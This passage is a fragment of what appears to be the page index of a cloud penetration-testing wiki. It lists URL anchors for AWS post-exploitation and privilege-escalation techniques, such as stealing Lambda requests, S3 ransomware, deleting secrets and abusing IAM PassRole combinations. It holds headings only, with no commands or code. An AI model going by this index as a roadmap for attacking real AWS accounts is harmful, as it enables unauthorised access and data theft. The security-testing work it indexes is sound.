aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#steal-others-lambda-url-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#steal-others-lambda-url-requests--extensions-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#aws---steal-lambda-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#lambda-flow","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#stealing-lambda-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#attack-steps","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#aws---lightsail-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#lightsail","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#restore-old-db-snapshots","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#restore-instance-snapshots","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#access-sensitive-information","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#aws---organizations-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#organizations","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#leave-the-org","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#aws---rds-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rds","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdscreatedbsnapshot-rdsrestoredbinstancefromdbsnapshot-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsmodifydbsnapshotattribute-rdscreatedbsnapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdownloaddblogfileportion","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdeletedbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsstartexporttask","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#aws---s3-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#sensitive-information","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#pivoting","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#aws---secrets-manager-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#secrets-manager","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#read-secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-change-secret-value","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-change-kms-key","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-deleting-secret","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#aws---ses-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#ses","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendrawemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendtemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulktemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulkemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbounce","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendcustomverificationemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#aws---sns-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#sns","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#disrupt-messages","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsdeletetopic","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snspublish","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssettopicattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssubscribe--snsunsubscribe","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsaddpermission--snsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snstagresource--snsuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#aws---sqs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqs","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsdeletequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqspurgequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssetqueueattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqstagqueue--sqsuntagqueue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#aws---sso--identitystore-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#sso--identitystore","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#ssodeletepermissionset--ssoputpermissionsboundarytopermissionset--ssodeleteaccountassignment","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#aws---step-functions-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#step-functions","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesrevealsecrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesdeletestatemachine-statesdeletestatemachineversion-statesdeletestatemachinealias","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatemaprun","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesstopexecution","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statestagresource-statesuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatestatemachine-lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#victim-setup-context-for-exploit","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#aws---sts-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#sts","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#from-iam-creds-to-console","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#bypass-user-agent-restrictions-from-python","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#aws---vpn-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#vpn","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws---privilege-escalation","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws-privilege-escalation","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#mindmap","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#tools","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#aws---apigateway-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigateway","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewaypost","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdaterestapipolicy-apigatewaypatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayputintegration-apigatewaycreatedeployment-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdateauthorizer-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdatevpclink","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.html#aws---apprunner-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.html#apprunner","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.html#iampassrole-apprunnercreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#aws---chime-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#chimecreateapikey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#aws---codebuild-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildcreateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch-s3getobject-s3putobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#aws---codepipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#iampassrole-codepipelinecreatepipeline-codebuildcreateproject-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codebuildupdateproject-codepipelineupdatepipeline-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipelinepollforjobs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#aws---codestar-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestar","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateprojectfromtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws---cloudformation-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationcreatestack","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatestackset--cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws-cdk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#determining-the-role-names","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#adding-malicious-code-to-the-project-source","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#iampassrole-cloudformationcreatestackand-cloudformationdescribestacks","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#aws---cognito-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#gathering-credentials-from-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identitysetidentitypoolroles-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identityupdate-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreategroup--cognito-idpupdategroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminconfirmsignup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmincreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminenableuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmininitiateauth--cognito-idpadminrespondtoauthchallenge","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetusersettings--cognito-idpsetusermfapreference--cognito-idpsetuserpoolmfaconfig--cognito-idpupdateuserpool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminupdateuserattributes","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserpoolclient--cognito-idpupdateuserpoolclient","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserimportjob--cognito-idpstartuserimportjob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateidentityprovider--cognito-idpupdateidentityprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-sync-analysis","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#automatic-tools","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#aws---datapipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#datapipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#iampassrole-datapipelinecreatepipeline-datapipelineputpipelinedefinition-datapipelineactivatepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws---directory-services-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#directory-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#dsresetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws-management-console","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#aws---dynamodb-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodb","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodbputresourcepolicy-and-optionally-dynamodbgetresourcepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#post-exploitation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#todo-read-data-abusing-data-streams","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#aws---ebs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebslistsnapshotblocks-ebsgetsnapshotblock-ec2describesnapshots","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ec2createsnapshot","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#aws---ec2-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole---iamaddroletoinstanceprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole--ec2associateiaminstanceprofile-ec2disassociateiaminstanceprofile--ec2replaceiaminstanceprofileassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2requestspotinstancesiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2modifyinstanceattribute","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2createlaunchtemplateversionec2createlaunchtemplateec2modifylaunchtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscalingcreatelaunchconfiguration--ec2createlaunchtemplate--iampassrole-autoscalingcreateautoscalinggroup--autoscalingupdateautoscalinggroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscaling","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendsshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendserialconsolesshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#describe-launch-templatesdescribe-launch-template-versions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#aws---ecr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtokenecrbatchgetimage","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtoken-ecrbatchchecklayeravailability-ecrcompletelayerupload-ecrinitiatelayerupload-ecrputimage-ecruploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicgetauthorizationtoken-ecr-publicbatchchecklayeravailability-ecr-publiccompletelayerupload-ecr-publicinitiatelayerupload-ecr-publicputimage-ecr-publicuploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrputregistrypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#aws---ecs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassroleecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsstarttask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistertaskdefinition--ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsexecutecommand-ecsdescribetasks-ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistercontainerinstance-ecsderegistercontainerinstance-ecsstarttask-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecscreatetaskset-ecsupdateserviceprimarytaskset-ecsdescribetasksets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#aws---efs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#efs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemdeletefilesystempolicyelasticfilesystemputfilesystempolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemclientmountelasticfilesystemclientrootaccesselasticfilesystemclientwrite","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemcreatemounttarget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemmodifymounttargetsecuritygroups","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#aws---elastic-beanstalk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-s3-write-permissions--many-others","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplication-elasticbeanstalkcreateenvironment-elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-iampassrole-and-more","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-cloudformationgettemplate-cloudformationdescribestackresources-cloudformationdescribestackresource-autoscalingdescribeautoscalinggroups-autoscalingsuspendprocesses-autoscalingsuspendprocesses","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#aws---emr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#iampassrole-elasticmapreducerunjobflow","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreducecreateeditor-iamlistroles-elasticmapreducelistclusters-iampassrole-elasticmapreducedescribeeditor-elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#aws---eventbridge-scheduler-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#iampassrole-schedulercreateschedule--schedulerupdateschedule","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#aws---gamelift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#gameliftrequestuploadcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#aws---glue-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatejob--glueupdatejob-gluestartjobrun--gluecreatetrigger","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatejob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#aws---iam-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreatepolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamsetdefaultpolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateloginprofile--iamupdateloginprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateservicespecificcredential--iamresetservicespecificcredential","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachuserpolicy--iamattachgrouppolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachrolepolicy---stsassumeroleiamcreaterole---iamputuserpolicy--iamputgrouppolicy--iamputrolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateassumerolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamuploadsshpublickey--iamdeactivatemfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamresyncmfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdatesamlprovider-iamlistsamlproviders-iamgetsamlprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateopenidconnectproviderthumbprint-iamlistopenidconnectproviders-iam-getopenidconnectprovider-","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamputuserpermissionsboundary","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#aws---kms-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kms","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmslistkeyskmsputkeypolicy-kmslistkeypolicies-kmsgetkeypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreategrant","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreatekey-kmsreplicatekey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmsdecrypt","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#aws---lambda-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdainvokefunction--lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreateeventsourcemapping","